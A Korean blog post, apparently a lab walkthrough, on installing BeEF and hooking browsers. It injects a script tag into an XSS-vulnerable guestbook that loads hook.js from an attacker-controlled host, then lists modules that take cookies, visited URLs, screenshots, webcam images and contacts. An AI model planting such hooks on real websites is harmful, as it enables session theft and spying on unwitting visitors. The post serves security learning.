본문 바로가기

해킹-보안

BeEF Framework를 이용한 웹 브라우저 후킹

반응형

ி BeEF(Browser Exploitation Framework)


웹 브라우저 공격을 위한 테스트 모듈이 포함된 프레임워크다.
BeEF는 "hook.js"라는 후킹을 위한 JavaScript 파일을 가지고 있으며,
피해자가 취약한 웹 페이지에서 해당 파일을 실행하면 BeEF 서버에 의해 악의적인 명령이 실행될 수 있다.



ி BeEF 설치


# git clone https://github.com/beefproject/beef.git
# cd beef; ./install
# vi beef/config.yaml

beef는 Default passwd 사용을 제한하고 있으니
config.yaml에서 다른 password로 변경한다.


BeEF 접속 주소는 127.0.0.1:3000/ui/panel이다.

# ./beef


ி BeEF Browser Hooking



<script src="http://192.168.111.132:3000/hook.js"></script>
공격자(.132)는 XSS가 동작하는 취약한 홈페이지의 방명록에 후킹 스크립트를 삽입하였다.
피해자는 방명록에 들어오면 저 스크립트가 실행되면서 브라우저가 hooking된다.


공격자는 BeEF에서 접속한 피해자의 정보를 바로 확인할 수 있다.  
.134는 후킹 스크립트가 삽입된 취약한 방명록 서버, 138은 피해자이다.   

이제 피해자의 브라우저를 연결 했으므로 수 많은 BeEF의 명령을 사용할 수 있다.
아래는 몇 가지 예시이다.

➽ 방문한 도메인 획득
➽ 쿠키 획득
➽ 웹캠
➽ 스크린샷
➽ 방문한 URL 획득
➽ Google 주소록 획득
➽ 소리 재생

사용하는 방법은 Module Tree에서 원하는 모듈을 선택하고 실행 버튼을 누르면 된다.

"소리 재생" 명령은 피해자의 브라우저에 내가 지정한 사운드 파일을 재생시킨다.

"웹캠" 명령을 사용하면 Hooked 된 브라우저에게 먼저 Adobe Flash 사용 요청을 보낸다. 

이때 "허용"을 하면 피해자의 모습이 보이게 된다.

이외에도 수 많은 모듈이 있는데 다 언급하지는 않겠다.

이러한 웹 브라우저를 이용한 취약점 공격은 가상머신 안에서 모두 시연한 것이니
부디 엉뚱한 시스템에다 하지 않기를 바랍니다.


반응형